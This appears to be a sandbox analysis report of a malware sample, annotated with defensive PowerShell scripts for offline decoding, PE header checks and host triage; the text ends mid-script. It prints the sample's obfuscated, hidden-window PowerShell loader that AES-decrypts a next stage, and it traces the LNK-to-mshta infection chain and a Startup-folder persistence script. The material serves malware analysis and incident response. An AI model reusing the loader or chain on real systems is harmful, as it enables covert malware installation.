        Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839341806.000001EB13A67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841460930.000001EB0EFB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841125562.000001EB1315A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1839954374.000001EB15CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840963450.000001EB139FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_pdo_mysql.pdb source: php_pdo_mysql.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_mysqli.pdb source: php_mysqli.dll.21.dr
        Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.1677761143.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840765627.000001EB139C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842211450.000001EB13116000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1679419864.000001EB131FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843243271.000001EB13118000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842473193.000001EB138C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841348809.000001EB13071000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php.pdb"""UGP source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
        Source: Binary string: 1D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php8ts.pdb source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp, php.exe, 0000001C.00000002.2896990047.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_sysvshm.pdb source: php_sysvshm.dll.21.dr
        Source: Binary string: D:\a\php-ftw\php-ftw\php\vs16\x64\obj\Release_TS\php_zend_test.pdb source: php_zend_test.dll.21.dr

        Data Obfuscation

        Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Leng
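The command line above is the whole decode stage of this loader: the hex string in $ddg is turned into bytes with a regex trick (every two characters become "0x.. " and the result is split on whitespace, which PowerShell then casts to a byte array), the first 2464 hex characters (1232 bytes, exactly 77 AES blocks, consistent with CBC plus PKCS7 padding) are the ciphertext, the remainder is the AES key, and the IV is sixteen zero bytes. The captured line is truncated after TransformFinalBlock, so whatever it does with the decoded text is not on this page. The script below is an added example by the editor, not the sample's own code and not part of the sandbox report: it re-implements that stage offline so an analyst can recover the next stage without running it. It assumes .NET's Aes.Create() defaults (CBC, PKCS7), the zero IV, and the layout <ciphertext hex><key hex> split at a caller-supplied offset; the round-trip vector at the bottom is constructed here with a random key and is not data from the sample.

```powershell
# Added example: offline re-implementation of the Emmenhtal-style decode stage.
# Decrypts only; nothing here invokes the returned text.

function ConvertFrom-HexPairs {
    param([Parameter(Mandatory)][string]$Hex)
    # Same trick as the loader's wLh(): "4142" -> "0x41 0x42 ", split on whitespace, cast to byte[]
    [byte[]](-split ($Hex -replace '..', '0x$& ').Trim())
}

function ConvertFrom-AesHexBlob {
    param(
        [Parameter(Mandatory)][string]$Blob,            # the $ddg string from the command line
        [Parameter(Mandatory)][int]$CipherHexLength     # 2464 for this sample (assumed layout: ciphertext hex, then key hex)
    )
    if ($CipherHexLength % 32 -ne 0) { throw "Ciphertext hex length $CipherHexLength is not a whole number of AES blocks" }
    [byte[]]$ct  = ConvertFrom-HexPairs ($Blob.Substring(0, $CipherHexLength))
    [byte[]]$key = ConvertFrom-HexPairs ($Blob.Substring($CipherHexLength))   # 16/24/32 bytes -> AES-128/192/256
    $aes = [System.Security.Cryptography.Aes]::Create()                        # defaults: Mode=CBC, Padding=PKCS7
    $aes.Key = $key
    $aes.IV  = New-Object byte[] 16                                            # all-zero IV, as in the loader
    $dec = $aes.CreateDecryptor()
    try {
        # A wrong key almost always surfaces here as a CryptographicException (bad PKCS7 padding)
        $plain = $dec.TransformFinalBlock($ct, 0, $ct.Length)
    } finally {
        $dec.Dispose(); $aes.Dispose()
    }
    # The loader calls [String]::new() on the byte[]; PowerShell widens each byte to one char (Latin-1)
    [string]::new([char[]]$plain)
}

# Constructed round-trip vector (not from the sample): a harmless line encrypted under a random
# 256-bit key and laid out exactly as the loader expects, <ciphertext hex><key hex>.
function New-TestBlob {
    param([string]$Plaintext = 'Write-Host "next stage would be here"')
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256
    $aes.GenerateKey()
    $aes.IV = New-Object byte[] 16
    $enc = $aes.CreateEncryptor()
    $pt  = [System.Text.Encoding]::ASCII.GetBytes($Plaintext)
    $ct  = $enc.TransformFinalBlock($pt, 0, $pt.Length)
    $hex = [BitConverter]::ToString([byte[]]($ct + $aes.Key)).Replace('-', '')
    [pscustomobject]@{ Blob = $hex; CipherHexLength = $ct.Length * 2 }
}

$t   = New-TestBlob
$out = ConvertFrom-AesHexBlob -Blob $t.Blob -CipherHexLength $t.CipherHexLength
if ($out -ne 'Write-Host "next stage would be here"') { throw 'round-trip failed' }
$out
```

To decode a real capture, pass the full $ddg string from the process command line as -Blob and the SubString offset the loader uses (2464 here) as -CipherHexLength, then read the returned text rather than executing it. Because the key travels inside the same string as the ciphertext, the AES layer hides nothing from anyone holding the command line; its purpose is to keep the next stage out of static scanners and to defeat naive string matching on the LNK and the HTA.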
        Source: samm[1].5.dr Static PE information: 0xDD4C8E8E [Wed Aug 27 00:19:26 2087 UTC]
        Source: nghttp2.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x4241f
        Source: gmodule-2.dll.21.dr Static PE information: real checksum: 0x0 should be: 0xe558
        Source: libsqlite3.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x19ad5d
        Source: legacy.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x3251b
        Source: icuin71.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x2f03aa
        Source: libsodium.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x5529f
        Source: libssh2.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x65fd1
        Source: libsasl.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x3de7f
        Source: deplister.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x2e96f
        Source: libpq.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x55808
        Source: samm[1].5.dr Static PE information: real checksum: 0x46055 should be: 0x16553c
        Source: libssl-3-x64.dll.21.dr Static PE information: real checksum: 0x0 should be: 0xc375a
        Source: libenchant2.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x17e60
        Source: libcrypto-3-x64.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x500978
        Source: php_bot_downloader_v2-AVERAGE-BOI-CLN.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x491b5
        Source: icuuc71.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x22b2e9
        Source: glib-2.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x1890d7
        Source: libenchant2_hunspell.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x7d0e9
        Source: icuio71.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x1bdbd
        Source: php_bot_downloader_v2-AVERAGE-BOI-CLN.exe.7.dr Static PE information: section name: _RDATA
        Source: deplister.exe.21.dr Static PE information: section name: _RDATA
        Source: legacy.dll.21.dr Static PE information: section name: .00cfg
        Source: php_gd.dll.21.dr Static PE information: section name: .rodata
        Source: libcrypto-3-x64.dll.21.dr Static PE information: section name: .00cfg
        Source: libssh2.dll.21.dr Static PE information: section name: .00cfg
        Source: libssl-3-x64.dll.21.dr Static PE information: section name: .00cfg
        Source: nghttp2.dll.21.dr Static PE information: section name: .00cfg
        Source: vcruntime140.dll.21.dr Static PE information: section name: _RDATA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9AF92370 push eax; iretd 7_2_00007FFD9AF9237D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9AF95974 pushad ; retf 7_2_00007FFD9AF95979
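Two of the static indicators in this section deserve a second look before they are read as obfuscation. A CheckSum of 0x0 is the linker's default (MSVC only fills the field when /RELEASE is given, which Microsoft's own binaries and drivers use), so the long run of "real checksum: 0x0" lines for the PHP DLLs is what a stock third-party build looks like; the one file whose checksum is set but wrong is samm[1] (0x46055 against a computed 0x16553c), which is what an image edited or packed after linking produces. The same file carries the 2087 TimeDateStamp; an impossible date is a fair signal, but deterministic builds (MSVC /Brepro) store a hash in that field, so it should be weighed with the checksum rather than alone. The function below is an added example by the editor, not the sandbox's code: it recomputes both fields for any PE on disk using the documented CheckSumMappedFile algorithm (32-bit end-around-carry sum over the image, CheckSum field skipped, folded to 16 bits, plus the file length). The usage path at the end is the dropped runtime location the report lists.

```powershell
# Added example: independent check of a PE's TimeDateStamp and header CheckSum.

function Get-PeHeaderTriage {
    param([Parameter(Mandatory)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 0x40 -or $b[0] -ne 0x4D -or $b[1] -ne 0x5A) { throw "Not an MZ file: $Path" }
    $pe = [BitConverter]::ToInt32($b, 0x3C)                                  # e_lfanew
    if ($pe -le 0 -or ($pe + 0x5C) -gt $b.Length -or [BitConverter]::ToUInt32($b, $pe) -ne 0x00004550) {
        throw "No PE signature: $Path"
    }
    $timeStamp   = [BitConverter]::ToUInt32($b, $pe + 8)                     # IMAGE_FILE_HEADER.TimeDateStamp
    $checksumOff = $pe + 4 + 20 + 64                                          # CheckSum is at +64 in PE32 and PE32+ alike
    $stored      = [BitConverter]::ToUInt32($b, $checksumOff)

    # Sum the image as little-endian DWORDs, skipping the CheckSum field, folding carries back in
    $len    = $b.Length
    $padded = $len + ((4 - ($len % 4)) % 4)
    $buf    = New-Object byte[] $padded
    [Array]::Copy($b, $buf, $len)
    [int64]$sum = 0
    for ($i = 0; $i -lt $padded; $i += 4) {
        if ($i -eq $checksumOff) { continue }
        $sum += [BitConverter]::ToUInt32($buf, $i)
        $sum  = ($sum -band 4294967295) + ($sum -shr 32)   # 0xFFFFFFFF in decimal: the hex literal is Int32 -1 in PowerShell
    }
    $sum = ($sum -band 0xFFFF) + ($sum -shr 16)
    $sum = ($sum + ($sum -shr 16)) -band 0xFFFF
    $expected = [uint32]($sum + $len)

    $compiled = [DateTimeOffset]::FromUnixTimeSeconds($timeStamp).UtcDateTime
    if     ($stored -eq 0)         { $state = 'unset (linker default unless /RELEASE; usual for non-Microsoft builds)' }
    elseif ($stored -eq $expected) { $state = 'valid' }
    else                           { $state = 'MISMATCH: image changed after linking, or header patched' }

    [pscustomobject]@{
        File             = $Path
        TimeDateStamp    = '0x{0:X8}' -f $timeStamp
        CompiledUtc      = $compiled
        FutureTimestamp  = $compiled -gt [DateTime]::UtcNow          # true for samm[1] (0xDD4C8E8E, year 2087)
        StoredChecksum   = '0x{0:X}' -f $stored
        ExpectedChecksum = '0x{0:X}' -f $expected
        ChecksumState    = $state
    }
}

# Usage against one of the dropped files named in the report; it lists 0x4241f as the expected value.
Get-PeHeaderTriage -Path "$env:APPDATA\php-8.2.11-Win32-vs16-x64\nghttp2.dll" | Format-List
```

Run it over every file under the dropped directory and sort on ChecksumState: a stock runtime will show one long column of "unset", and anything reporting MISMATCH or a future CompiledUtc is the file worth pulling into a disassembler.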

        Persistence and Installation Behavior

        Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK file Process created: C:\Windows\System32\mshta.exe
        Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK file Process created: C:\Windows\System32\cmd.exe
        Source: LNK file Process created: C:\Windows\System32\cmd.exe
        Source: LNK file Process created: C:\Windows\System32\cmd.exe
        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exe
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\vcruntime140.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exe
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exe
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exe
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dll
        Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8ts.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dll
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\license.txt
        Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\readme-redist-bins.txt

        Boot Survival

        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs
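The installation and boot-survival evidence above fits together as one picture: the LNK runs wmic.exe, which creates mshta.exe through Win32_Process.Create; mshta.exe hands off to powershell.exe; tar.exe unpacks a complete PHP 8.2.11 Windows runtime (file list, license.txt and readme-redist-bins.txt are consistent with a stock distribution) under %APPDATA%; and php.exe writes PHP-8.2.vbs into the per-user Startup folder. Two consequences matter for response. First, the interpreter is probably a clean, possibly signed binary, so hashes and signatures will not flag it; the anomaly is where it lives and what launches it. Second, Win32_Process.Create runs inside the WMI provider host, so the child of a "wmic process call create" is parented by WmiPrvSE.exe rather than by wmic.exe or explorer.exe, and parent-chain rules written around the LNK's own process tree will miss mshta.exe. The script below is an added example by the editor, not the sample's code and not part of the sandbox report; it triages a live host for all three facts. It assumes only the report's paths (the per-user Startup folder and a php.exe under %APPDATA%) and standard Win32_Process data, and it treats PID reuse as a known limitation of the parent lookup.

```powershell
# Added example: live host triage for the persistence and launch chain described above.

function Get-StartupScriptArtifacts {
    # Both Startup folders; the sample only touched the per-user one (PHP-8.2.vbs)
    $dirs = @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))
    $scriptExt = '.vbs', '.vbe', '.js', '.jse', '.wsf', '.wsh', '.hta', '.ps1', '.bat', '.cmd', '.lnk'
    foreach ($dir in $dirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $scriptExt -contains $_.Extension.ToLowerInvariant() } |
            ForEach-Object {
                [pscustomobject]@{
                    Path       = $_.FullName
                    CreatedUtc = $_.CreationTimeUtc
                    SHA256     = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                    # a one-line VBS launcher shows its target in the first line
                    FirstLine  = Get-Content -LiteralPath $_.FullName -TotalCount 1 -ErrorAction SilentlyContinue
                }
            }
    }
}

function Get-UserProfilePhpRuntimes {
    # A PHP interpreter under %APPDATA% is the interesting fact; the binary itself may be a stock
    # build that hash-based AV will never flag. Report location, version, signature and live use.
    $appData = [Environment]::GetFolderPath('ApplicationData')
    $procs   = @(Get-CimInstance Win32_Process -Filter "Name = 'php.exe'" -ErrorAction SilentlyContinue)
    Get-ChildItem -LiteralPath $appData -Filter 'php.exe' -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $exe  = $_.FullName
            $live = @($procs | Where-Object { $_.ExecutablePath -eq $exe })
            [pscustomobject]@{
                Path         = $exe
                Version      = $_.VersionInfo.ProductVersion
                Signature    = (Get-AuthenticodeSignature -FilePath $exe).Status
                RunningCount = $live.Count
                CommandLines = @($live | ForEach-Object { $_.CommandLine })
            }
        }
}

function Get-WmiSpawnedScriptHosts {
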